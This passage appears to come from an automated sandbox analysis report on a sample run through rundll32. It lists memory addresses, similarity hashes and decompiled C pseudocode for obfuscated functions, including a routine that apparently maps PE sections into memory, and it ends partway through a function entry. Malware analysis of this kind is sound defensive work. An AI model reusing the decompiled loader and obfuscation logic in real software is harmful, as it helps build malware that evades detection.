                                                                      0x01ffe1d1
                                                                      0x01ffe1d9
                                                                      0x01ffe1e1
                                                                      0x01ffe1e6
                                                                      0x01ffe1ee
                                                                      0x01ffe1f6
                                                                      0x01ffe1fe
                                                                      0x01ffe206
                                                                      0x01ffe20e
                                                                      0x01ffe216
                                                                      0x01ffe226
                                                                      0x01ffe22b
                                                                      0x01ffe231
                                                                      0x01ffe239
                                                                      0x01ffe241
                                                                      0x01ffe24e
                                                                      0x01ffe251
                                                                      0x01ffe255
                                                                      0x01ffe25a
                                                                      0x01ffe25f
                                                                      0x01ffe267
                                                                      0x01ffe26f
                                                                      0x01ffe274
                                                                      0x01ffe279
                                                                      0x01ffe281
                                                                      0x01ffe289
                                                                      0x01ffe28e
                                                                      0x01ffe296
                                                                      0x01ffe29e
                                                                      0x01ffe2a6
                                                                      0x01ffe2ae
                                                                      0x01ffe2bb
                                                                      0x01ffe2c7
                                                                      0x01ffe2cf
                                                                      0x01ffe2d2
                                                                      0x01ffe2d6
                                                                      0x01ffe2de
                                                                      0x01ffe2e2
                                                                      0x01ffe2e2
                                                                      0x01ffe2e6
                                                                      0x01ffe2e6
                                                                      0x01ffe2e6
                                                                      0x01ffe2e6
                                                                      0x01ffe2ec
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ffe2f2
                                                                      0x01ffe3b9
                                                                      0x00000000
                                                                      0x01ffe3b9
                                                                      0x01ffe2fe
                                                                      0x01ffe3a9
                                                                      0x01ffe3af
                                                                      0x00000000
                                                                      0x01ffe3af
                                                                      0x01ffe30a
                                                                      0x01ffe37e
                                                                      0x01ffe383
                                                                      0x01ffe38a
                                                                      0x01ffe392
                                                                      0x00000000
                                                                      0x01ffe392
                                                                      0x01ffe312
                                                                      0x01ffe337
                                                                      0x01ffe33c
                                                                      0x01ffe34e
                                                                      0x01ffe353
                                                                      0x01ffe35b
                                                                      0x01ffe35d
                                                                      0x01ffe35d
                                                                      0x01ffe35b
                                                                      0x00000000
                                                                      0x01ffe33c
                                                                      0x01ffe31a
                                                                      0x00000000
                                                                      0x01ffe320
                                                                      0x01ffe329
                                                                      0x01ffe32b
                                                                      0x00000000
                                                                      0x01ffe32b
                                                                      0x01ffe31a
                                                                      0x01ffe3c9
                                                                      0x01ffe446
                                                                      0x01ffe44b
                                                                      0x01ffe44d
                                                                      0x01ffe452
                                                                      0x01ffe45e
                                                                      0x00000000
                                                                      0x01ffe45e
                                                                      0x01ffe454
                                                                      0x00000000
                                                                      0x01ffe454
                                                                      0x01ffe3d1
                                                                      0x01ffe47e
                                                                      0x01ffe488
                                                                      0x01ffe48e
                                                                      0x01ffe48e
                                                                      0x01ffe3dd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ffe3e3
                                                                      0x01ffe40c
                                                                      0x01ffe41f
                                                                      0x01ffe422
                                                                      0x01ffe423
                                                                      0x01ffe428
                                                                      0x00000000
                                                                      0x01ffe463
                                                                      0x01ffe463
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: >9$\%$`p$tD$v2${R$D$D
                                                                      • API String ID: 0-2873933158
                                                                      • Opcode ID: bbddb9203957df02dec585f6924e82c5eea2bee525b51d5e8b8249602370e4c5
                                                                      • Instruction ID: 9f30710e393f5f055cd4e68c01a1df6979a44ce5ac21097d998d31fbac3cf595
                                                                      • Opcode Fuzzy Hash: bbddb9203957df02dec585f6924e82c5eea2bee525b51d5e8b8249602370e4c5
                                                                      • Instruction Fuzzy Hash: F0B1317290C3419FE354CF29C48980BBBE1FBD4758F418A1DF6E996260D3B5DA098F86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023D5B8, Relevance: 10.2, Strings: 8, Instructions: 237COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: >9$\%$`p$tD$v2${R$D$D
                                                                      • API String ID: 0-2873933158
                                                                      • Opcode ID: d239047f8fd533ba29a1152434985cbeae24259cbc72a2d0326ef89d7b38c88b
                                                                      • Instruction ID: 56a122e249e5c1a15f0186e46f1c442f2379ef1c81f8210aa6b8861ad1fdf663
                                                                      • Opcode Fuzzy Hash: d239047f8fd533ba29a1152434985cbeae24259cbc72a2d0326ef89d7b38c88b
                                                                      • Instruction Fuzzy Hash: 38B154B291C3419FD354CF25C48940BBBE2FBD4358F40892DF5A996260D3B4EA5ACF86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF5B7D, Relevance: 10.1, Strings: 8, Instructions: 136COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 90%
                                                                      			E01FF5B7D(void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _t120;
				void* _t128;
				void* _t136;
				void* _t138;
				signed int _t140;
				void* _t157;
				void* _t162;
				intOrPtr* _t164;
				signed int* _t166;
				signed int* _t167;
				signed int* _t168;

				_t164 = __edx;
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				_t120 = E02002550(0);
				_v8 = _t120;
				_v4 = _t120;
				_v16 = 0xc2989;
				_v12 = 0x5a483c;
				_v52 = 0x3b44;
				_v52 = _v52 << 7;
				_t140 = 0x4c;
				_v52 = _v52 * 0x47;
				_v52 = _v52 ^ 0x0837fe00;
				_v60 = 0x214b;
				_v60 = _v60 + 0xffff3690;
				_v60 = _v60 + 0x4bfa;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x0007dffd;
				_v68 = 0xfe09;
				_v68 = _v68 + 0x553f;
				_v68 = _v68 * 0x1d;
				_v68 = _v68 ^ 0x1b24c5d9;
				_v68 = _v68 ^ 0x1b02eedd;
				_v36 = 0xe0e0;
				_v36 = _v36 | 0x0a33301d;
				_v36 = _v36 ^ 0x0a33cb55;
				_v40 = 0x9bfa;
				_v40 = _v40 * 0x75;
				_v40 = _v40 ^ 0x004737ff;
				_v28 = 0x4d67;
				_v28 = _v28 * 0x2c;
				_v28 = _v28 ^ 0x000d0c51;
				_v64 = 0x3be;
				_v64 = _v64 + 0xc067;
				_v64 = _v64 + 0x5cfa;
				_v64 = _v64 / _t140;
				_v64 = _v64 ^ 0x0000016e;
				_v32 = 0x9b8d;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x00006036;
				_v48 = 0x458d;
				_v48 = _v48 >> 3;
				_v48 = _v48 + 0xffffc11e;
				_v48 = _v48 ^ 0xffffb28b;
				_v24 = 0x2d22;
				_v24 = _v24 + 0xffff832a;
				_v24 = _v24 ^ 0xffffbd86;
				_v44 = 0xc1ed;
				_v44 = _v44 << 0xa;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0xf6803b82;
				_v20 = 0x855f;
				_v20 = _v20 >> 7;
				_v20 = _v20 ^ 0x00003be3;
				_v56 = 0x7b80;
				_v56 = _v56 * 0x26;
				_v56 = _v56 + 0xffff7d11;
				_v56 = _v56 ^ 0x0011d251;
				_t141 = _v68;
				_t128 = E020098B1(_v68, _v36, _v40, __edx);
				_t166 =  &(( &_v68)[8]);
				_t136 = _t128;
				if(_t136 != 0) {
					_t157 = E02002A07( *((intOrPtr*)(_t136 + 0x50)), _v60 | _v52, _v28, _t141, _v64, _v56, _v32);
					_t167 =  &(_t166[5]);
					if(_t157 == 0) {
						L6:
						return _t157;
					}
					E01FF6374(_v48, _t157,  *((intOrPtr*)(_t136 + 0x54)),  *__edx, _v24);
					_t168 =  &(_t167[3]);
					_t162 = ( *(_t136 + 0x14) & 0x0000ffff) + 0x18 + _t136;
					_t138 = ( *(_t136 + 6) & 0x0000ffff) * 0x28 + _t162;
					while(_t162 < _t138) {
						_t134 =  <  ?  *((void*)(_t162 + 8)) :  *((intOrPtr*)(_t162 + 0x10));
						E01FF6374(_v44,  *((intOrPtr*)(_t162 + 0xc)) + _t157,  <  ?  *((void*)(_t162 + 8)) :  *((intOrPtr*)(_t162 + 0x10)),  *_t164 +  *((intOrPtr*)(_t162 + 0x14)), _v20);
						_t168 =  &(_t168[3]);
						_t162 = _t162 + 0x28;
					}
					goto L6;
				}
				return _t128;
			}































                                                                      0x01ff5b84
                                                                      0x01ff5b86
                                                                      0x01ff5b87
                                                                      0x01ff5b8b
                                                                      0x01ff5b8f
                                                                      0x01ff5b93
                                                                      0x01ff5b94
                                                                      0x01ff5b95
                                                                      0x01ff5b9a
                                                                      0x01ff5ba0
                                                                      0x01ff5ba4
                                                                      0x01ff5bac
                                                                      0x01ff5bb4
                                                                      0x01ff5bbc
                                                                      0x01ff5bc8
                                                                      0x01ff5bca
                                                                      0x01ff5bce
                                                                      0x01ff5bd6
                                                                      0x01ff5bde
                                                                      0x01ff5be6
                                                                      0x01ff5bee
                                                                      0x01ff5bf3
                                                                      0x01ff5bfb
                                                                      0x01ff5c03
                                                                      0x01ff5c10
                                                                      0x01ff5c14
                                                                      0x01ff5c1c
                                                                      0x01ff5c24
                                                                      0x01ff5c2c
                                                                      0x01ff5c34
                                                                      0x01ff5c3c
                                                                      0x01ff5c49
                                                                      0x01ff5c4d
                                                                      0x01ff5c55
                                                                      0x01ff5c62
                                                                      0x01ff5c66
                                                                      0x01ff5c6e
                                                                      0x01ff5c76
                                                                      0x01ff5c7e
                                                                      0x01ff5c8c
                                                                      0x01ff5c90
                                                                      0x01ff5c98
                                                                      0x01ff5ca0
                                                                      0x01ff5ca5
                                                                      0x01ff5cad
                                                                      0x01ff5cb5
                                                                      0x01ff5cba
                                                                      0x01ff5cc2
                                                                      0x01ff5cca
                                                                      0x01ff5cd2
                                                                      0x01ff5cda
                                                                      0x01ff5ce2
                                                                      0x01ff5cea
                                                                      0x01ff5cef
                                                                      0x01ff5cf4
                                                                      0x01ff5cfc
                                                                      0x01ff5d04
                                                                      0x01ff5d09
                                                                      0x01ff5d11
                                                                      0x01ff5d1e
                                                                      0x01ff5d22
                                                                      0x01ff5d2a
                                                                      0x01ff5d3a
                                                                      0x01ff5d3e
                                                                      0x01ff5d43
                                                                      0x01ff5d46
                                                                      0x01ff5d4a
                                                                      0x01ff5d72
                                                                      0x01ff5d74
                                                                      0x01ff5d79
                                                                      0x01ff5dd7
                                                                      0x00000000
                                                                      0x01ff5dd9
                                                                      0x01ff5d8c
                                                                      0x01ff5d95
                                                                      0x01ff5d9f
                                                                      0x01ff5da4
                                                                      0x01ff5dd2
                                                                      0x01ff5dbe
                                                                      0x01ff5dc7
                                                                      0x01ff5dcc
                                                                      0x01ff5dcf
                                                                      0x01ff5dcf
                                                                      0x00000000
                                                                      0x01ff5dd6
                                                                      0x01ff5ddf

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "-$6`$<HZ$?U$D;$K!$gM$;
                                                                      • API String ID: 0-541240929
                                                                      • Opcode ID: 351712b6d6cbc9e8907103eb125a307d12d6f643fa008f15f0959c67586ec1b1
                                                                      • Instruction ID: 3bf43c11c6579670f34c88f009f848d3a2599e40b5ec9b21dcd7c81191ed52bc
                                                                      • Opcode Fuzzy Hash: 351712b6d6cbc9e8907103eb125a307d12d6f643fa008f15f0959c67586ec1b1
                                                                      • Instruction Fuzzy Hash: 795112B1408340AFD354CF65C88980BFBF5BBC4758F408A1DFA99962A0D7BAD949CF06
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002350F1, Relevance: 10.1, Strings: 8, Instructions: 136COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "-$6`$<HZ$?U$D;$K!$gM$;
                                                                      • API String ID: 0-541240929
                                                                      • Opcode ID: bd18d84c34761732b3e16a2086b9908adac1db33b08af174a17316736eeaa7c0
                                                                      • Instruction ID: 1e5f564ab5450714ec5b4b3b7669279cec54aeee8b2739e58acacade9e586203
                                                                      • Opcode Fuzzy Hash: bd18d84c34761732b3e16a2086b9908adac1db33b08af174a17316736eeaa7c0
                                                                      • Instruction Fuzzy Hash: 4E5122B1418340AFD358CF65C98980BFBF5BBC4758F408A1DF99A96260D3BAC959CF06
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023177C, Relevance: 10.1, Strings: 8, Instructions: 126COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !i$&4$'$)*$4j\$IX$Y^$\
                                                                      • API String ID: 0-1966681874
                                                                      • Opcode ID: 2ab281e20babec8f914e23fe26d2a0305b4f6cc775f439d274d1a935f3a080a8
                                                                      • Instruction ID: bce125f109882f6d9395106b2c9a14880b400f11d5eb6f12cfdc546ed44c3ac5
                                                                      • Opcode Fuzzy Hash: 2ab281e20babec8f914e23fe26d2a0305b4f6cc775f439d274d1a935f3a080a8
                                                                      • Instruction Fuzzy Hash: 9C512571C0121AEBEF19CFE5D94A5EEBBB1FF05304F208199D511B62A0D7B90A69CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF4844, Relevance: 9.0, Strings: 7, Instructions: 259COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 95%
                                                                      			E01FF4844() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				unsigned int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				unsigned int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				void* _t297;
				void* _t300;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				void* _t348;
				signed int* _t352;

				_t352 =  &_v1156;
				_v1048 = 0xd4c9;
				_v1048 = _v1048 * 0x4c;
				_t348 = 0x16977827;
				_v1048 = _v1048 ^ 0x003f2fc5;
				_v1152 = 0x1223;
				_v1152 = _v1152 + 0xffffe86f;
				_v1152 = _v1152 << 0xe;
				_v1152 = _v1152 + 0xffffc4b4;
				_v1152 = _v1152 ^ 0xfea449db;
				_v1140 = 0xd009;
				_v1140 = _v1140 << 0xf;
				_v1140 = _v1140 | 0x34d7ffad;
				_t310 = 0x67;
				_v1140 = _v1140 * 0x78;
				_v1140 = _v1140 ^ 0x853faa5e;
				_v1108 = 0xfb19;
				_v1108 = _v1108 / _t310;
				_v1108 = _v1108 | 0xfc9c85cc;
				_v1108 = _v1108 + 0xffff75b2;
				_v1108 = _v1108 ^ 0xfc9bca28;
				_v1096 = 0x8988;
				_v1096 = _v1096 >> 0xf;
				_v1096 = _v1096 >> 2;
				_v1096 = _v1096 ^ 0xb058b54e;
				_v1096 = _v1096 ^ 0xb058a14a;
				_v1092 = 0x4bf5;
				_v1092 = _v1092 ^ 0x3fcc7587;
				_v1092 = _v1092 + 0xffff7c60;
				_v1092 = _v1092 ^ 0x3fcbd886;
				_v1124 = 0x90b1;
				_v1124 = _v1124 | 0x0315067d;
				_v1124 = _v1124 << 0xf;
				_v1124 = _v1124 >> 0xd;
				_v1124 = _v1124 ^ 0x00061076;
				_v1100 = 0x6642;
				_v1100 = _v1100 + 0x2c45;
				_v1100 = _v1100 + 0xffffed6b;
				_v1100 = _v1100 + 0xc076;
				_v1100 = _v1100 ^ 0x000143f3;
				_v1132 = 0xeff1;
				_t311 = 0x75;
				_v1132 = _v1132 / _t311;
				_v1132 = _v1132 >> 4;
				_t312 = 0x1b;
				_v1132 = _v1132 * 0x22;
				_v1132 = _v1132 ^ 0x00007806;
				_v1064 = 0x9d13;
				_v1064 = _v1064 + 0xffff9636;
				_v1064 = _v1064 ^ 0x00006af4;
				_v1116 = 0xe2d7;
				_v1116 = _v1116 / _t312;
				_v1116 = _v1116 >> 0xf;
				_v1116 = _v1116 << 2;
				_v1116 = _v1116 ^ 0x00007ff5;
				_v1080 = 0xca15;
				_v1080 = _v1080 << 8;
				_t313 = 0x44;
				_v1080 = _v1080 / _t313;
				_v1080 = _v1080 ^ 0x0002d41f;
				_v1148 = 0x482;
				_v1148 = _v1148 | 0x6f5ddb7d;
				_v1148 = _v1148 >> 7;
				_v1148 = _v1148 ^ 0x00de8355;
				_v1072 = 0xb874;
				_t314 = 0x5f;
				_v1072 = _v1072 / _t314;
				_v1072 = _v1072 ^ 0x00004463;
				_v1056 = 0xaefc;
				_v1056 = _v1056 | 0xd38cb8c2;
				_v1056 = _v1056 ^ 0xd38ca246;
				_v1144 = 0x8c63;
				_t315 = 0x7c;
				_v1144 = _v1144 / _t315;
				_v1144 = _v1144 >> 9;
				_v1144 = _v1144 << 7;
				_v1144 = _v1144 ^ 0x00001598;
				_v1084 = 0x1bb3;
				_v1084 = _v1084 | 0xfc2ca821;
				_v1084 = _v1084 * 0x7a;
				_v1084 = _v1084 ^ 0x2d512892;
				_v1088 = 0x616c;
				_v1088 = _v1088 + 0xffff5892;
				_v1088 = _v1088 ^ 0x224cc7f0;
				_v1088 = _v1088 ^ 0xddb37e9b;
				_v1136 = 0x8caf;
				_v1136 = _v1136 >> 0xb;
				_v1136 = _v1136 >> 1;
				_v1136 = _v1136 * 0x1f;
				_v1136 = _v1136 ^ 0x00000e7d;
				_v1076 = 0xc9f6;
				_v1076 = _v1076 << 9;
				_v1076 = _v1076 >> 0xc;
				_v1076 = _v1076 ^ 0x0000608f;
				_v1068 = 0x998d;
				_v1068 = _v1068 ^ 0xf04ba484;
				_v1068 = _v1068 ^ 0xf04b529f;
				_v1128 = 0x17ad;
				_v1128 = _v1128 ^ 0xb750fecf;
				_v1128 = _v1128 ^ 0x37dc0b1b;
				_v1128 = _v1128 * 0x74;
				_v1128 = _v1128 ^ 0x3fd6ce0a;
				_v1044 = 0x27ee;
				_v1044 = _v1044 << 0xf;
				_v1044 = _v1044 ^ 0x13f7204f;
				_v1112 = 0xf1d1;
				_v1112 = _v1112 << 0x10;
				_v1112 = _v1112 >> 0xc;
				_v1112 = _v1112 + 0xffff75c7;
				_v1112 = _v1112 ^ 0x000ef6df;
				_v1060 = 0x618f;
				_v1060 = _v1060 + 0xffff6fb8;
				_v1060 = _v1060 ^ 0xffffc83e;
				_v1120 = 0x72ef;
				_v1120 = _v1120 >> 0xe;
				_v1120 = _v1120 + 0xffff6b18;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0xfffdf85c;
				_v1052 = 0xbded;
				_v1052 = _v1052 | 0xda406fe1;
				_v1052 = _v1052 ^ 0xda40c173;
				_v1156 = 0xd36a;
				_v1156 = _v1156 << 0xd;
				_v1156 = _v1156 << 0xa;
				_v1156 = _v1156 << 5;
				_v1156 = _v1156 ^ 0xa000634b;
				_v1104 = 0x4b7d;
				_v1104 = _v1104 + 0xffff7f0e;
				_v1104 = _v1104 << 6;
				_v1104 = _v1104 ^ 0x67f3b216;
				_v1104 = _v1104 ^ 0x98012c8f;
				_t297 = E02001999();
				do {
					while(_t348 != 0x16977827) {
						if(_t348 == 0x1a33a432) {
							return E0200CBE7( &_v520, _v1052, __eflags, _v1156, _v1104,  &_v1040);
						}
						if(_t348 == 0x25c7bc2a) {
							_push(0x1ff1348);
							_push(_v1088);
							_push(_v1084);
							_t300 = E01FF5DFC(_v1056, _v1144, __eflags);
							E0200BAEC(0x104, __eflags, _v1068, _t300,  *0x2011088 + 0x38, _v1128, _v1044,  &_v1040, E01FFA156(),  *0x2011088 + 0x254);
							_t297 = E02000D6D(_v1112, _v1060, _v1120, _t300);
							_t352 =  &(_t352[0xd]);
							_t348 = 0x1a33a432;
							continue;
						}
						_t358 = _t348 - 0x33badc0c;
						if(_t348 != 0x33badc0c) {
							goto L8;
						}
						_push(0x1ff12d8);
						_push(_v1092);
						_push(_v1096);
						E01FFA4D7(_t358, _v1100, _v1132, _v1064, _v1116, E01FF5DFC(_v1140, _v1108, _t358),  *0x2011088 + 0x254,  &_v520,  *0x2011088 + 0x38);
						_t297 = E02000D6D(_v1080, _v1148, _v1072, _t306);
						_t352 =  &(_t352[0xd]);
						_t348 = 0x25c7bc2a;
					}
					_t348 = 0x33badc0c;
					L8:
					__eflags = _t348 - 0x27e22baf;
				} while (__eflags != 0);
				return _t297;
			}












































                                                                      0x01ff4844
                                                                      0x01ff484a
                                                                      0x01ff485d
                                                                      0x01ff4861
                                                                      0x01ff4866
                                                                      0x01ff486e
                                                                      0x01ff4876
                                                                      0x01ff487e
                                                                      0x01ff4883
                                                                      0x01ff488b
                                                                      0x01ff4893
                                                                      0x01ff489b
                                                                      0x01ff48a0
                                                                      0x01ff48af
                                                                      0x01ff48b2
                                                                      0x01ff48b6
                                                                      0x01ff48be
                                                                      0x01ff48ce
                                                                      0x01ff48d2
                                                                      0x01ff48da
                                                                      0x01ff48e2
                                                                      0x01ff48ea
                                                                      0x01ff48f2
                                                                      0x01ff48f7
                                                                      0x01ff48fc
                                                                      0x01ff4904
                                                                      0x01ff490c
                                                                      0x01ff4914
                                                                      0x01ff491c
                                                                      0x01ff4924
                                                                      0x01ff492c
                                                                      0x01ff4934
                                                                      0x01ff493c
                                                                      0x01ff4941
                                                                      0x01ff4946
                                                                      0x01ff494e
                                                                      0x01ff4956
                                                                      0x01ff495e
                                                                      0x01ff4966
                                                                      0x01ff496e
                                                                      0x01ff4976
                                                                      0x01ff4982
                                                                      0x01ff4987
                                                                      0x01ff498d
                                                                      0x01ff4997
                                                                      0x01ff499a
                                                                      0x01ff499e
                                                                      0x01ff49a6
                                                                      0x01ff49ae
                                                                      0x01ff49b6
                                                                      0x01ff49be
                                                                      0x01ff49ce
                                                                      0x01ff49d2
                                                                      0x01ff49d7
                                                                      0x01ff49dc
                                                                      0x01ff49e4
                                                                      0x01ff49ec
                                                                      0x01ff49f5
                                                                      0x01ff49f8
                                                                      0x01ff49fc
                                                                      0x01ff4a06
                                                                      0x01ff4a0e
                                                                      0x01ff4a16
                                                                      0x01ff4a1b
                                                                      0x01ff4a23
                                                                      0x01ff4a31
                                                                      0x01ff4a36
                                                                      0x01ff4a3c
                                                                      0x01ff4a44
                                                                      0x01ff4a4c
                                                                      0x01ff4a54
                                                                      0x01ff4a5c
                                                                      0x01ff4a68
                                                                      0x01ff4a6b
                                                                      0x01ff4a6f
                                                                      0x01ff4a74
                                                                      0x01ff4a79
                                                                      0x01ff4a81
                                                                      0x01ff4a89
                                                                      0x01ff4a96
                                                                      0x01ff4a9a
                                                                      0x01ff4aa2
                                                                      0x01ff4aaa
                                                                      0x01ff4ab2
                                                                      0x01ff4aba
                                                                      0x01ff4ac2
                                                                      0x01ff4aca
                                                                      0x01ff4acf
                                                                      0x01ff4ad8
                                                                      0x01ff4adc
                                                                      0x01ff4ae4
                                                                      0x01ff4aec
                                                                      0x01ff4af1
                                                                      0x01ff4af6
                                                                      0x01ff4afe
                                                                      0x01ff4b06
                                                                      0x01ff4b0e
                                                                      0x01ff4b16
                                                                      0x01ff4b1e
                                                                      0x01ff4b26
                                                                      0x01ff4b33
                                                                      0x01ff4b37
                                                                      0x01ff4b3f
                                                                      0x01ff4b4a
                                                                      0x01ff4b52
                                                                      0x01ff4b5d
                                                                      0x01ff4b65
                                                                      0x01ff4b6a
                                                                      0x01ff4b6f
                                                                      0x01ff4b77
                                                                      0x01ff4b7f
                                                                      0x01ff4b87
                                                                      0x01ff4b8f
                                                                      0x01ff4b97
                                                                      0x01ff4b9f
                                                                      0x01ff4ba4
                                                                      0x01ff4bac
                                                                      0x01ff4bb1
                                                                      0x01ff4bb9
                                                                      0x01ff4bc1
                                                                      0x01ff4bc9
                                                                      0x01ff4bd1
                                                                      0x01ff4bd9
                                                                      0x01ff4bde
                                                                      0x01ff4be3
                                                                      0x01ff4be8
                                                                      0x01ff4bf0
                                                                      0x01ff4bf8
                                                                      0x01ff4c00
                                                                      0x01ff4c05
                                                                      0x01ff4c0d
                                                                      0x01ff4c1d
                                                                      0x01ff4c31
                                                                      0x01ff4c31
                                                                      0x01ff4c3f
                                                                      0x00000000
                                                                      0x01ff4d82
                                                                      0x01ff4c47
                                                                      0x01ff4cc5
                                                                      0x01ff4cca
                                                                      0x01ff4cce
                                                                      0x01ff4cdd
                                                                      0x01ff4d2b
                                                                      0x01ff4d40
                                                                      0x01ff4d45
                                                                      0x01ff4d48
                                                                      0x00000000
                                                                      0x01ff4d48
                                                                      0x01ff4c49
                                                                      0x01ff4c4b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ff4c51
                                                                      0x01ff4c56
                                                                      0x01ff4c5a
                                                                      0x01ff4c9e
                                                                      0x01ff4cb6
                                                                      0x01ff4cbb
                                                                      0x01ff4cbe
                                                                      0x01ff4cbe
                                                                      0x01ff4d4f
                                                                      0x01ff4d51
                                                                      0x01ff4d51
                                                                      0x01ff4d51
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: E,$Kc$cD$la$}K$'$r
                                                                      • API String ID: 0-4173883944
                                                                      • Opcode ID: de0748037eeefac12261f3013889c7af2949dee63a99769dd2319c64226db495
                                                                      • Instruction ID: 6ca84cc8613357bb12aaf18af0f276ed593c0aada827cdb8b34c8e420797a2d2
                                                                      • Opcode Fuzzy Hash: de0748037eeefac12261f3013889c7af2949dee63a99769dd2319c64226db495
                                                                      • Instruction Fuzzy Hash: B6D100715097819FE368CF25C58995FFBF1BBC4748F008A1DF2A9962A0D7B58909CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00233DB8, Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: E,$Kc$cD$la$}K$'$r
                                                                      • API String ID: 0-4173883944
                                                                      • Opcode ID: 6a175492a499137ea374cfe269ddd9e9c8d4711c6dbcf778b749c7f062f43257
                                                                      • Instruction ID: 6ab440a76e5e7ada8caa49b4ede37e914cd20e3b612231a5966a8f830ba1d653
                                                                      • Opcode Fuzzy Hash: 6a175492a499137ea374cfe269ddd9e9c8d4711c6dbcf778b749c7f062f43257
                                                                      • Instruction Fuzzy Hash: 35D122B14093819FE368CF21C98994BFBF1BBC5748F108A1DF1A9962A0D7B58919CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 020093AA, Relevance: 9.0, Strings: 7, Instructions: 242COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 91%
